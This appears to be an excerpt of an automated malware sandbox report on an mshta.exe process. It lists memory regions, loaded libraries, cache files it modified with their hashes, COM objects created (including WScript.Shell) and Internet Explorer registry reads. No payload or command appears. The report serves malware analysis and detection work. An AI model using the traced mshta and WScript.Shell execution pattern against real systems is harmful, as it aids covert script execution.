pagefile_0x00000000000c0000	0x000c0000	0x000c1fff	Pagefile Backed Memory	Readable, Writable	Region Actions
mshta.exe.mui	0x000d0000	0x000d0fff	Memory Mapped File	Readable, Writable	Region Actions
private_0x00000000000e0000	0x000e0000	0x000e0fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000000f0000	0x000f0000	0x001effff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000001f0000	0x001f0000	0x001f0fff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000200000	0x00200000	0x00200fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000210000	0x00210000	0x00210fff	Private Memory	Readable, Writable	Region Actions Download Dump
rpcss.dll	0x00220000	0x0027bfff	Memory Mapped File	Readable	Region Actions
private_0x0000000000220000	0x00220000	0x0025ffff	Private Memory	Readable, Writable	Region Actions Download Dump
urlmon.dll.mui	0x00260000	0x00267fff	Memory Mapped File	Readable, Writable	Region Actions
pagefile_0x0000000000270000	0x00270000	0x00270fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000280000	0x00280000	0x00280fff	Pagefile Backed Memory	Readable	Region Actions
windowsshell.manifest	0x00290000	0x00290fff	Memory Mapped File	Readable	Region Actions
pagefile_0x0000000000290000	0x00290000	0x00290fff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x00000000002a0000	0x002a0000	0x002a1fff	Pagefile Backed Memory	Readable	Region Actions
mshta.exe	0x002b0000	0x002befff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x00000000002c0000	0x002c0000	0x002c1fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000002d0000	0x002d0000	0x002d1fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000002e0000	0x002e0000	0x002e0fff	Pagefile Backed Memory	Readable, Writable	Region Actions
index.dat	0x002f0000	0x002fffff	Memory Mapped File	Readable, Writable	Region Actions Download Dump
index.dat	0x00300000	0x00307fff	Memory Mapped File	Readable, Writable	Region Actions Download Dump
private_0x0000000000310000	0x00310000	0x0040ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000410000	0x00410000	0x0055ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000410000	0x00410000	0x004d7fff	Pagefile Backed Memory	Readable	Region Actions
index.dat	0x004e0000	0x004ebfff	Memory Mapped File	Readable, Writable	Region Actions Download Dump
private_0x00000000004f0000	0x004f0000	0x0053ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000004f0000	0x004f0000	0x004f0fff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x00000000004f0000	0x004f0000	0x004f0fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000500000	0x00500000	0x0053ffff	Private Memory	Readable, Writable	Region Actions Download Dump
oleaccrc.dll	0x00540000	0x00540fff	Memory Mapped File	Readable	Region Actions
private_0x0000000000550000	0x00550000	0x0055ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000560000	0x00560000	0x0057ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000580000	0x00580000	0x00580fff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000580000	0x00580000	0x00581fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000590000	0x00590000	0x0059ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x00000000005a0000	0x005a0000	0x006a0fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000006b0000	0x006b0000	0x012affff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000012b0000	0x012b0000	0x0138efff	Pagefile Backed Memory	Readable	Region Actions
c_20127.nls	0x01390000	0x013a0fff	Memory Mapped File	Readable	Region Actions
private_0x00000000013f0000	0x013f0000	0x014effff	Private Memory	Readable, Writable	Region Actions Download Dump
sortdefault.nls	0x014f0000	0x017befff	Memory Mapped File	Readable	Region Actions
private_0x00000000017c0000	0x017c0000	0x019effff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000017c0000	0x017c0000	0x0183ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001860000	0x01860000	0x0195ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000019b0000	0x019b0000	0x019effff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001a30000	0x01a30000	0x01b2ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001b30000	0x01b30000	0x01c8ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001b30000	0x01b30000	0x01c6ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001b30000	0x01b30000	0x01c2ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001c80000	0x01c80000	0x01c8ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001cd0000	0x01cd0000	0x01dcffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001dd0000	0x01dd0000	0x01f9ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001dd0000	0x01dd0000	0x01ecffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001f40000	0x01f40000	0x01f7ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001f90000	0x01f90000	0x01f9ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000002020000	0x02020000	0x0211ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000002240000	0x02240000	0x0233ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000002430000	0x02430000	0x0252ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000002530000	0x02530000	0x02922fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000002940000	0x02940000	0x02a3ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000002a90000	0x02a90000	0x02b8ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000002b90000	0x02b90000	0x02c8ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000002c90000	0x02c90000	0x02e1ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000002d60000	0x02d60000	0x02e5ffff	Private Memory	Readable, Writable	Region Actions Download Dump
mshtml.dll	0x63150000	0x63706fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ieframe.dll	0x6d270000	0x6dceffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
npmproxy.dll	0x6e2d0000	0x6e2d7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
jscript.dll	0x6e8c0000	0x6e971fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msls31.dll	0x6eaa0000	0x6eac9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rasadhlp.dll	0x6f010000	0x6f015fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
netprofm.dll	0x6f530000	0x6f589fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wshom.ocx	0x71f90000	0x71fb0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msimtf.dll	0x72270000	0x7227afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sensapi.dll	0x72280000	0x72285fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oleacc.dll	0x726e0000	0x7271bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rasman.dll	0x72910000	0x72924fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rasapi32.dll	0x72930000	0x72981fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
dhcpcsvc.dll	0x73250000	0x73261fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
dhcpcsvc6.dll	0x73270000	0x7327cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
fwpuclnt.dll	0x73280000	0x732b7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winnsi.dll	0x733b0000	0x733b6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
iphlpapi.dll	0x733c0000	0x733dbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
nlaapi.dll	0x734e0000	0x734effff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntmarta.dll	0x737f0000	0x73810fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rtutils.dll	0x73820000	0x7382cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winrnr.dll	0x73a50000	0x73a57fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pnrpnsp.dll	0x73a60000	0x73a71fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
napinsp.dll	0x73a90000	0x73a9ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
dwmapi.dll	0x73bd0000	0x73be2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
uxtheme.dll	0x73f00000	0x73f3ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
comctl32.dll	0x74080000	0x7421dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
version.dll	0x745f0000	0x745f8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wshtcpip.dll	0x74680000	0x74684fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rsaenh.dll	0x74910000	0x7494afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
dnsapi.dll	0x749f0000	0x74a33fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wship6.dll	0x74b20000	0x74b25fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mswsock.dll	0x74b30000	0x74b6bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptsp.dll	0x74b70000	0x74b85fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sspicli.dll	0x74fd0000	0x74feafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x74ff0000	0x74ffbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sxs.dll	0x75000000	0x7505efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrtremote.dll	0x75090000	0x7509dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
profapi.dll	0x750a0000	0x750aafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msasn1.dll	0x75110000	0x7511bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
crypt32.dll	0x75120000	0x7523cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x75260000	0x752a9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x75420000	0x754c0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x754d0000	0x7556ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
normaliz.dll	0x75570000	0x75572fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oleaut32.dll	0x75580000	0x7560efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
iertutil.dll	0x75610000	0x7580afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shell32.dll	0x75810000	0x76459fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x76460000	0x76469fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x76470000	0x7648efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
urlmon.dll	0x76490000	0x765c5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x765d0000	0x7661dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x76620000	0x766e8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ole32.dll	0x766f0000	0x7684bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x76850000	0x768ecfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x768f0000	0x76908fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
clbcatq.dll	0x76ab0000	0x76b32fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x76b40000	0x76c0bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x76c10000	0x76ce3fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wininet.dll	0x76cf0000	0x76de4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wldap32.dll	0x76df0000	0x76e34fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x76e40000	0x76eebfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x76f50000	0x7708bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
nsi.dll	0x77090000	0x77095fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ws2_32.dll	0x770d0000	0x77104fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
psapi.dll	0x77110000	0x77114fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x77120000	0x77176fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apisetschema.dll	0x77190000	0x77190fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007ffaf000	0x7ffaf000	0x7ffaffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007ffd3000	0x7ffd3000	0x7ffd3fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffd4000	0x7ffd4000	0x7ffd4fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffd5000	0x7ffd5000	0x7ffd5fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffd6000	0x7ffd6000	0x7ffd6fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffd7000	0x7ffd7000	0x7ffd7fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffd8000	0x7ffd8000	0x7ffd8fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffd9000	0x7ffd9000	0x7ffd9fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffda000	0x7ffda000	0x7ffdafff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdb000	0x7ffdb000	0x7ffdbfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdc000	0x7ffdc000	0x7ffdcfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	Readable, Writable	Region Actions Download Dump
For performance reasons, the remaining 21 entries are omitted. The remaining entries can be found in flog.txt.

Modified Files

Filename	File Size	Hash Values	Actions
c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\temporary internet files\content.ie5\b9mx3v6b\foobaz[1].txt	0.33 KB (335 bytes)	MD5: 5e96b592b960ec8b481f9a75f6d60e3b SHA1: 495590c98ccbfcbc17a622e29912d4ad4009b36e SHA256: b17c0528463b2e7c191c2adaec4135848564597531cb9b7554b8fc80d1ac0c45	File Actions Show Properties Download
c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\temporary internet files\content.ie5\index.dat	64.00 KB (65536 bytes)	MD5: 538010a9ee2bd83dce6e6181bcda3df3 SHA1: 5f8d3d25c60d5c9ecf2627422c77c7a895c67d4e SHA256: 9f70b9e987c662a9555182f299b9196ae5b3bb5e8128dd75e5ac3e6f49632b60	File Actions Show Properties Download
c:\users\bgc6u8oy yxgxkr\appdata\roaming\microsoft\windows\cookies\index.dat	32.00 KB (32768 bytes)	MD5: 52e5f12a1c455d32f6cafd01a89ad68e SHA1: 3de6de86748edb5d0f9c7ca464a2301ee03b753b SHA256: d2b2d583e7f30d11cb2daeae50b2617676783ed6cd360e0b47209d9787e224a2	File Actions Show Properties Download
c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\history\history.ie5\index.dat	48.00 KB (49152 bytes)	MD5: d35b4ef54f22a55d2252d7c75217680e SHA1: bc0c688702dc593e4a8448d723dd9311ee177aba SHA256: 6871ece75631267dfa058661f117eda144a1f1936468df1d8cf7eb1f4b11474d	File Actions Show Properties Download

Host Behavior

COM (6)

Operation	Class	Interface	Additional Information	Count	Logfile
Create	3050F5C8-98B5-11CF-BB82-00AA00BDCE0B	00000000-0000-0000-C000-000000000046	cls_context = CLSCTX_INPROC_SERVER	1	Fn
Create	50D5107A-D278-4871-8989-F4CEAAF59CFC	08C0E040-62D1-11D1-9326-0060B067B86E	cls_context = CLSCTX_INPROC_SERVER, CLSCTX_NO_CODE_DOWNLOAD	1	Fn
Create	F414C260-6AC0-11CF-B6D1-00AA00BBBB58	BB1A2AE1-A4F9-11CF-8F20-00805F2CD064	cls_context = CLSCTX_INPROC_SERVER	1	Fn
Create	00000323-0000-0000-C000-000000000046	00000146-0000-0000-C000-000000000046	cls_context = CLSCTX_INPROC_SERVER	1	Fn
Create	6C736DB1-BD94-11D0-8A23-00AA00B58E10	6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8	cls_context = CLSCTX_INPROC_SERVER	1	Fn
Create	WScript.Shell	IClassFactory	cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	1	Fn

File (4)

Operation	Filename	Additional Information	Count	Logfile
Open	STD_INPUT_HANDLE	-	1	Fn
Open	STD_OUTPUT_HANDLE	-	1	Fn
Open	STD_ERROR_HANDLE	-	1	Fn
Open Mapping	#MSHTML#PERF#00000A18	desired_access = FILE_MAP_WRITE	1	Fn

Registry (106)

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CLASSES_ROOT\clsid\{25336920-03f9-11cf-8fd0-00aa00686f13}\InProcServer32	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl	-	6	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl	-	8	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl	-	8	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl	-	6	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ARIA_SUPPORT	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ARIA_SUPPORT	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_DISPPARAMS	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_DISPPARAMS	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PRIVATE_FONT_SETTING	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PRIVATE_FONT_SETTING	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_SHOW_HIDE_EVENTS	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_SHOW_HIDE_EVENTS	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISPLAY_NODE_ADVISE_KB833311	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISPLAY_NODE_ADVISE_KB833311	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_EXPANDURI_BYPASS	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_EXPANDURI_BYPASS	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DATABINDING_SUPPORT	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DATABINDING_SUPPORT	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENFORCE_BSTR	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENFORCE_BSTR	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl	-	2	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl	-	2	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLEANUP_AT_FLS	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLEANUP_AT_FLS	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DOCUMENT_COMPATIBLE_MODE	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DOCUMENT_COMPATIBLE_MODE	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_DOCUMENT_ZOOM	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_DOCUMENT_ZOOM	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PageSetup	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_XSSFILTER	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_XSSFILTER	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script\Features	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\COM3	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ADDITIONAL_IE8_MEMORY_CLEANUP	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ADDITIONAL_IE8_MEMORY_CLEANUP	-	1	Fn
Read Value	HKEY_CLASSES_ROOT\clsid\{25336920-03f9-11cf-8fd0-00aa00686f13}\InProcServer32	data = C:\Windows\System32\mshtml.dll, type = REG_SZ	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer	value_name = NoFileMenu, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PageSetup	value_name = Print_Background	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\COM3	value_name = COM+Enabled, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn

Process (1)

Operation	Process	Additional Information	Success	Count	Logfile
